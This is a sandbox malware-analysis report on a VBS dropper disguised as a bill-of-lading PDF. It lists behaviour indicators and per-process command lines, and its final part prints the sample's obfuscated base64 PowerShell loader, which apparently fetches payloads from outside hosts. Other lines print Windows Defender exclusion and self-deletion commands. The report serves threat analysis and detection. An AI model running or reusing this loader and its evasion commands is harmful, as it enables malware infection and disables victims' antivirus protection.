File name:

208430284251.billofolading.Inv.e-Awb.pl.04292025.20240814.174354.20240814.174426.0429202_pdf.vbs

Full analysis: https://app.any.run/tasks/7cb33ca4-8d3e-45d0-a28c-85da98d51b87
Verdict: Malicious activity
Analysis date: April 29, 2025, 12:58:20
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-startup
api-base64
Indicators:
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (10071), with CRLF line terminators
MD5:

2F2905BCF3CF2F495B56DAE4510D9A22

SHA1:

25B83D2CE5C433727D3C6BEEACDEF794DCCFCEF0

SHA256:

68A13E8577695CEFCF279C20A6F206BDA07F4AC9A7F962941EFC4DFB96A4A870

SSDEEP:

384:2zDDDDDDDj5v+NhXoziSUb/mRtYiczDDDDDDDjjDDDDDDDDDDDDDDDD1DDDDDDDw:2N5xUb/mRPcO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 4844)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 5972)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 5972)

    • Starts CMD.EXE for self-deleting

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 4844)

    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 4844)

    • Changes Windows Defender settings

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 4844)

    • Create files in the Startup directory

      • cmd.exe (PID: 1912)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4428)
      • wscript.exe (PID: 4436)

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 4428)
      • wscript.exe (PID: 4436)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 4428)
      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 2908)
      • wscript.exe (PID: 4436)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 4844)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 4428)
      • wscript.exe (PID: 4436)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 4428)
      • powershell.exe (PID: 5072)
      • wscript.exe (PID: 4436)
      • powershell.exe (PID: 1312)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 4844)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 1312)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 5972)

    • The process executes Powershell scripts

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 1312)

    • Get information on the list of running processes

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 1312)

    • Probably download files using WebClient

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 1312)

    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 5972)

    • Application launched itself

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 4844)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 4844)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 6744)
      • cmd.exe (PID: 4920)
      • cmd.exe (PID: 680)
      • cmd.exe (PID: 1912)
      • cmd.exe (PID: 2148)
      • cmd.exe (PID: 6540)
      • cmd.exe (PID: 6156)
      • cmd.exe (PID: 6964)
      • cmd.exe (PID: 4944)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5172)

    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 4844)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5868)
      • cmd.exe (PID: 5596)

  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 4844)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 1312)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5072)
      • powershell.exe (PID: 1312)

    • Reads the software policy settings

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 5972)
      • slui.exe (PID: 5056)

    • Checks proxy server information

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 4844)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 5972)

    • Disables trace logs

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 4844)

    • Create files in a temporary directory

      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 5972)

    • Creates a new folder

      • cmd.exe (PID: 6036)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1912)
      • powershell.exe (PID: 1052)
      • powershell.exe (PID: 4268)
      • powershell.exe (PID: 3020)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1912)
      • powershell.exe (PID: 1052)
      • powershell.exe (PID: 3020)
      • powershell.exe (PID: 4268)

    • Auto-launch of the file from Startup directory

      • cmd.exe (PID: 1912)

    • Potential dynamic function import (Base64 Encoded 'GetProcAddress')

      • powershell.exe (PID: 6048)

    • Potential library load (Base64 Encoded 'LoadLibrary')

      • powershell.exe (PID: 6048)

    • Manual execution by a user

      • wscript.exe (PID: 4436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (49.9)
.bas | Nevada BASIC tokenized source (25)
.mp3 | MP3 audio (24.9)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
197
Monitored processes
64
Malicious processes
10
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe powershell.exe powershell.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs reg.exe no specs cmd.exe cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe powershell.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs slui.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668ping 127.0.0.1 -n 1 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
680cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\admin\AppData\Local\Temp\DLL03.ps1"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1052powershell $S = 'C:\Users\admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1116C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
1184cmd.exe /c ping 127.0.0.1 -n C:\Users\admin\AppData\Local\Temp\208430284251.billofolading.Inv.e-Awb.pl.04292025.20240814.174354.20240814.174426.0429202_pdf.vbs & del "1"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1280ping 127.0.0.1 -n 1 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
1312ping 127.0.0.1 -n 1 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
1312"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $lwzmk = 'OwAgAG0AZQ' + [char]66 + 'zAHgAUwAkACAAZQ' + [char]66 + 'sAGkARgAtACAAcw' + [char]66 + 'zAGEAcA' + [char]66 + '5AEIAIA' + [char]66 + '5AGMAaQ' + [char]66 + 'sAG8AUA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AHUAYw' + [char]66 + 'lAHgARQAtACAAbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAgAG0AZQ' + [char]66 + 'zAHgAUwAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAQw' + [char]66 + 'PAHgAVw' + [char]66 + '0ACQAOwAgACkAIAAnADEAcw' + [char]66 + 'wAC4AMwAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAbQ' + [char]66 + 'lAHMAeA' + [char]66 + 'TACQAOwAgACcAOwApACAAKQAgACcAJwAyADMAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcA' + [char]66 + 'uAGkAZA' + [char]66 + 'kAGEAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EADEARAAgAEQAJwAnACAALAAgACcAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAJwAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGwAbw' + [char]66 + 'jAGEAbA' + [char]66 + 'iAHUAcw' + [char]66 + 'pAG4AZQ' + [char]66 + 'lAHMAcwAuAGMAbw' + [char]66 + 'tAC4AYg' + [char]66 + 'yAC8AaQ' + [char]66 + 'tAGEAZw' + [char]66 + 'lAHMALw' + [char]66 + 'iAGwAZQ' + [char]66 + 'zAHMAaQ' + [char]66 + 'uAGcAcwAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAQw' + [char]66 + 'PAHgAVw' + [char]66 + '0ACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAQw' + [char]66 + 'PAHgAVw' + [char]66 + '0ACQAOwAgACcALgApACAAcA' + [char]66 + 'lAFUARw' + [char]66 + 'oACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAEMATw' + [char]66 + '4AFcAdAAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHAAZQ' + [char]66 + 'VAEcAaAAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'DAE8AeA' + [char]66 + 'XAHQAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAbw' + [char]66 + 'JAFkAZg' + [char]66 + '0ACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAApACAAJwAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'vAEkAWQ' + [char]66 + 'mAHQAJAAnACAAPQAgAEMATw' + [char]66 + '4AFcAdAAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAEQAQg' + [char]66 + '6AEYAQgAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAdg' + [char]66 + 'MAEoAcg' + [char]66 + 'XACQAOwApAEgATg' + [char]66 + 'ZAGoARwAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHYATA' + [char]66 + 'KAHIAVwAkADsAIAApACAAYg' + [char]66 + 'QAGcAdA' + [char]66 + 'zACQAIAAoAGEAdA' + [char]66 + 'hAEQAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Aeg' + [char]66 + 'RAFAAYw' + [char]66 + 'LACQAIAA9ACAASA' + [char]66 + 'OAFkAag' + [char]66 + 'HACQAOwAgACkAIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + 'iAFAAZw' + [char]66 + '0AHMAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '6AFEAUA' + [char]66 + 'jAEsAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '6AFEAUA' + [char]66 + 'jAEsAJAA7ACAAKQAgACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'EAEIAeg' + [char]66 + 'GAEIAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAZg' + [char]66 + 'xAE4AWg' + [char]66 + 'jACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'mAE4ASw' + [char]66 + 'CAGIAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAGYATg' + [char]66 + 'LAEIAYgAkACAAOw' + [char]66 + 'mAE4ASw' + [char]66 + 'CAGIAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'qAG4AcQ' + [char]66 + '5AHkAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + 'mAE4ASw' + [char]66 + 'CAGIAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAA7ACkAIAAnAC8Adw' + [char]66 + 'hAHIALw' + [char]66 + '0AG4AZQ' + [char]66 + '2AG0AZAAvAHQAZQ' + [char]66 + 'uAC4AeQ' + [char]66 + 'yAGUAdA' + [char]66 + 'zAGEAcAAuAHcAdw' + [char]66 + '3AC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACgAIAA9ACAAag' + [char]66 + 'uAHEAeQ' + [char]66 + '5ACQAOw' + [char]66 + '9ADsAcA' + [char]66 + 'lAFUARw' + [char]66 + 'oACQAIA' + [char]66 + 'uAHIAdQ' + [char]66 + '0AGUAcgA7ACkAKQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHAAZQ' + [char]66 + 'VAEcAaAAkADsAew' + [char]66 + '5AE0AZQ' + [char]66 + 'zAGEAQgAgAG4Abw' + [char]66 + 'pAHQAYw' + [char]66 + 'uAHUARgA7AGUAcw' + [char]66 + 'hAGIAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAJAA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAA==';$lwzmk = $lwzmk.replace('的五实' , 'B') 